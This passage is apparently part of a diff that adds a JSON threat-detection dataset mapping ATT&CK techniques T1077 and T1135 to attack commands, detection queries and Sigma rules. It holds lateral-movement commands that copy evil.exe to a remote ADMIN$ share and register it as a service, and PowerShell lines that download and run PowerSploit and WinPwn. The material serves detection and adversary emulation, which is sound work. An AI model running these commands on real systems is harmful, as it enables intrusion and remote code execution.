], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + 
"https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1077", + "command_list": [ + "net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]\nnet use \\\\COMP\\ADMIN$ password /user:COMP\\Administrator (checking password reuse on local admin account)", + "shell net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]", + "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv" + ], + "commands": [ + { + "command": "net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]\nnet use \\\\COMP\\ADMIN$ password /user:COMP\\Administrator (checking password reuse on local admin account)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" 
/user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + } + ], + "parsed_datasets": [ + { + "Category": "T1077", + "Built-in Windows Command": "net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]\nnet use \\\\COMP\\ADMIN$ password /user:COMP\\Administrator (checking password reuse on local admin account)", + "Cobalt Strike": "shell net use [\\\\ip\\path] [password] [/user:DOMAIN\\user]", + "Metasploit": "", + "Description": "Used to view network shared resource information, add a new network resource, and remove an old network resource from the computer. Run this against computers discovered from the previous two commands to view the shares that are available on them." 
+ }, + { + "Category": "T1077", + "Built-in Windows Command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Cobalt Strike": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "Metasploit": "", + "Description": "This technique creates a new service on the remote machine. It's important to note the spaces after the = in these commands! Also, before starting the service, run the following commands to make sure everything is set up properly:\nsc \\\\COMP qc acachsrv\ndir \\\\COMP\\ADMIN$\\acachsrv.exe" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and process_path contains \"net.exe\"and (process_command_line contains \"use\"or process_command_line contains \"session\"or process_command_line contains \"file\")", + "name": "Windows Admin Shares" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or process_path contains \"powershell.exe\")and ((process_command_line contains \"*net* use*$\"or process_command_line contains \"*net* session*$\"or process_command_line contains \"*net* file*$\")or process_command_line contains \"*New-PSDrive*root*\")", + "name": "Windows Admin Shares Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and process_path contains \"net.exe\"and process_command_line contains \"net share\"", + "name": "Windows Admin Shares Process Created" 
+ } + ], + "possible_detections": [ + { + "title": "Access to ADMIN$ Share", + "id": "098d7118-55bc-4912-a836-dc6483a8d150", + "description": "Detects access to $ADMIN share", + "tags": [ + "attack.lateral_movement", + "attack.t1077" + ], + "status": "experimental", + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "security", + "definition": "The advanced audit policy setting \"Object Access > Audit File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5140, + "ShareName": "Admin$" + }, + "filter": { + "SubjectUserName": "*$" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Legitimate administrative activity" + ], + "level": "low" + }, + { + "title": "First time seen remote named pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", + "references": [ + "https://twitter.com/menasec1/status/1104489274387451904" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1077" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection1": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$" + }, + "selection2": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": [ + "atsvc", + "samr", + "lsarpc", + "winreg", + "netlogon", + "srvsvc", + "protected_storage", + "wkssvc", + "browser", + "netdfs" + ] + }, + "condition": "selection1 and not selection2" + }, + "falsepositives": [ + "update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "level": "high" + }, + { + "title": "Suspicious PsExec execution", + "id": 
"c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1077" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection1": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": [ + "*-stdin", + "*-stdout", + "*-stderr" + ] + }, + "selection2": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": "PSEXESVC*" + }, + "condition": "selection1 and not selection2" + }, + "falsepositives": [ + "nothing observed so far" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4624", + "Authentication logs" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "http://www.secureworks.com/resources/blog/living-off-the-land/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + 
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1135", + "command_list": [ + "net share", + "auxiliary/scanner/smb/smb_enumshares", + "net view \\\\host /all [/domain:domain]", + "net view \\\\host /domain", + "df -aH\nsmbutil view -g //computer1\nshowmount computer1\n", + "smbstatus --shares\n", + "net view \\\\localhost\n", + "get-smbshare\n", + "net share\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose\n", + "Import-Module $env:TEMP\\PowerView.ps1\nInvoke-ShareFinder -CheckShareAccess\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nshareenumeration -noninteractive -consoleoutput", + "Get-SmbShare | ConvertTo-Json", + "net view \\\\#{remote.host.fqdn} /all", + "powershell/situational_awareness/network/powerview/get_dfs_share", + "powershell/situational_awareness/network/powerview/share_finder", + "python/situational_awareness/network/active_directory/get_fileservers", + "python/situational_awareness/network/smb_mount" + ], + "commands": [ + { + "command": "net share", + "source": 
"https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net share", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "auxiliary/scanner/smb/smb_enumshares", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net view \\\\host /all [/domain:domain]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "net view \\\\host /domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "df -aH\nsmbutil view -g //computer1\nshowmount computer1\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "smbstatus --shares\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "net view \\\\localhost\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "get-smbshare\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "net share\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "Import-Module 
$env:TEMP\\PowerView.ps1\nInvoke-ShareFinder -CheckShareAccess\n", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nshareenumeration -noninteractive -consoleoutput", + "source": "atomics/T1135/T1135.yaml", + "name": "Atomic Red Team Test - Network Share Discovery" + }, + { + "command": "Get-SmbShare | ConvertTo-Json", + "source": "data/abilities/discovery/530e47c6-8592-42bf-91df-c59ffbd8541b.yml", + "name": "Network Share Discovery" + }, + { + "command": "net view \\\\#{remote.host.fqdn} /all", + "source": "data/abilities/discovery/deeac480-5c2a-42b5-90bb-41675ee53c7e.yml", + "name": "View the shares of a remote host" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_dfs_share", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/share_finder", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/active_directory/get_fileservers", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/smb_mount", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1135", + "Built-in Windows Command": "net share", + "Cobalt Strike": "net share", + "Metasploit": "auxiliary/scanner/smb/smb_enumshares", + 
"Description": "Used to view network shared resource information, share a new network resource, and remove an old shared network resource from the workstation. Not for remote queries" + }, + { + "Category": "T1135", + "Built-in Windows Command": "net view \\\\host /all [/domain:domain]", + "Cobalt Strike": "net view \\\\host /domain", + "Metasploit": "auxiliary/scanner/smb/smb_enumshares", + "Description": "Display the list of workstations and network devices on the network. " + }, + { + "attack_technique": "T1135", + "display_name": "Network Share Discovery", + "atomic_tests": [ + { + "name": "Network Share Discovery", + "auto_generated_guid": "f94b5ad9-911c-4eff-9718-fd21899db4f7", + "description": "Network Share Discovery\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "computer_name": { + "description": "Computer name to find a mount on.", + "type": "String", + "default": "computer1" + } + }, + "executor": { + "command": "df -aH\nsmbutil view -g //#{computer_name}\nshowmount #{computer_name}\n", + "name": "sh" + } + }, + { + "name": "Network Share Discovery - linux", + "auto_generated_guid": "875805bc-9e86-4e87-be86-3a5527315cae", + "description": "Network Share Discovery using smbstatus\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "package_checker": { + "description": "Package checking command. Debian - dpkg -s samba", + "type": "String", + "default": "(rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)" + }, + "package_installer": { + "description": "Package installer command. 
Debian - apt install samba", + "type": "String", + "default": "(which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Package with smbstatus (samba) must exist on device\n", + "prereq_command": "if #{package_checker} > /dev/null; then exit 0; else exit 1; fi\n", + "get_prereq_command": "sudo #{package_installer} \n" + } + ], + "executor": { + "command": "smbstatus --shares\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Network Share Discovery command prompt", + "auto_generated_guid": "20f1097d-81c1-405c-8380-32174d493bbb", + "description": "Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host\nUpon execution avalaible network shares will be displayed in the powershell session\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Computer name to find a mount on.", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "command": "net view \\\\#{computer_name}\n", + "name": "command_prompt" + } + }, + { + "name": "Network Share Discovery PowerShell", + "auto_generated_guid": "1b0814d1-bb24-402d-9615-1b20c50733fb", + "description": "Network Share Discovery utilizing PowerShell. 
The computer name variable may need to be modified to point to a different host\nUpon execution, avalaible network shares will be displayed in the powershell session\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "get-smbshare\n", + "name": "powershell" + } + }, + { + "name": "View available share drives", + "auto_generated_guid": "ab39a04f-0c93-4540-9ff2-83f862c385ae", + "description": "View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "net share\n", + "name": "command_prompt" + } + }, + { + "name": "Share Discovery with PowerView", + "auto_generated_guid": "b1636f0a-ba82-435c-b699-0d78794d8bfd", + "description": "Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Endpoint must be joined to domain\n", + "prereq_command": "if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "\"Join system to domain\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose\n", + "name": "powershell" + } + }, + { + "name": "PowerView ShareFinder", + "auto_generated_guid": "d07e4cc1-98ae-447e-9d31-36cb430d28c4", + "description": "PowerView is a PowerShell tool to gain network situational awareness on Windows domains. 
ShareFinder finds (non-standard) shares on machines in the domain.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "parameters": { + "description": "ShareFinder parameter", + "type": "String", + "default": "-CheckShareAccess" + } + }, + "dependencies": [ + { + "description": "Invoke-ShareFinder module must exist in %TEMP% directory", + "prereq_command": "if (Test-Path $env:TEMP\\PowerView.ps1) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1\" -OutFile $env:TEMP\\PowerView.ps1\n" + } + ], + "executor": { + "command": "Import-Module $env:TEMP\\PowerView.ps1\nInvoke-ShareFinder #{parameters}\n", + "name": "powershell" + } + }, + { + "name": "WinPwn - shareenumeration", + "auto_generated_guid": "987901d1-5b87-4558-a6d9-cffcabc638b8", + "description": "Network share enumeration using the shareenumeration function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nshareenumeration -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "530e47c6-8592-42bf-91df-c59ffbd8541b", + "name": "View admin shares", + "description": "Network Share Discovery", + "tactic": "discovery", + "technique": { + "attack_id": "T1135", + "name": "Network Share Discovery" + }, + "platforms": { + "windows": { + "pwsh,psh": { + "command": "Get-SmbShare | ConvertTo-Json", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.smb.share", + "custom_parser_vals": { + "json_key": "Path", + "json_type": "str" + } + } + ] + } + } + } + } + }, + { + "id": "deeac480-5c2a-42b5-90bb-41675ee53c7e", + "name": "View remote 
shares", + "description": "View the shares of a remote host", + "tactic": "discovery", + "technique": { + "attack_id": "T1135", + "name": "Network Share Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "net view \\\\#{remote.host.fqdn} /all", + "parsers": { + "plugins.stockpile.app.parsers.net_view": [ + { + "source": "remote.host.fqdn", + "edge": "has_share", + "target": "remote.host.share" + } + ] + } + }, + "cmd": { + "command": "net view \\\\#{remote.host.fqdn} /all", + "parsers": { + "plugins.stockpile.app.parsers.net_view": [ + { + "source": "remote.host.fqdn", + "edge": "has_share", + "target": "remote.host.share" + } + ] + } + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_dfs_share", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_dfs_share\": [\"T1135\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/share_finder", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/share_finder\": [\"T1135\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_fileservers", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_fileservers\": [\"T1135\"]," + }, + { + "Empire Module": "python/situational_awareness/network/smb_mount", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/smb_mount\": [\"T1135\"]," + } + ], + "queries": [ + { + "product": "Azure 
Sentinel", + "query": "Sysmon| where process_path contains \"net.exe\"and (process_command_line contains \"view\"or process_command_line contains \"share\")", + "name": "Network Share Discovery" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"and (process_command_line contains \"net view\"or process_command_line contains \"net share\"))or process_command_line contains \"get-smbshare -Name\"", + "name": "Network Share Discovery Process" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "experimental", + "description": "Detects automated lateral movement by Turla group", + "references": [ + "https://securelist.com/the-epic-turla-operation/65545/" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1077", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ], + "author": "Markus Neis", + "date": "2017/11/07", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "falsepositives": [ + "Unknown" + ] + }, + { + "detection": { + "selection": { + "CommandLine": [ + "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" *", + "dir c:\\\\*.doc* /s", + "dir %TEMP%\\\\*.exe" + ] + }, + "condition": "selection" + }, + "level": "critical" + }, + { + "detection": { + "netCommand1": { + "CommandLine": "net view /DOMAIN" + }, + "netCommand2": { + "CommandLine": "net session" + }, + "netCommand3": { + "CommandLine": "net share" + }, + "timeframe": "1m", + "condition": "netCommand1 | near netCommand2 and netCommand3" + }, + "level": "medium" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "Network protocol analysis" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD 
Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + 
"target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + 
